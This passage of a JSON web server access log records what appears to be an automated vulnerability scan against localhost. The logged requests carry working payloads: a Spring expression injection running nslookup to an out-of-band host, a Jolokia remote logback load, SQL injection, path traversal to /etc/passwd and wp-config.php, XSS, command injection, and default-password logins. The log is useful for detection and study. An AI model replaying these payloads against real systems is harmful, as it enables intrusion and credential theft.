HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c9v8gc8smpv8b0ng0t00ohjk15bb9x8es.oast.online%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 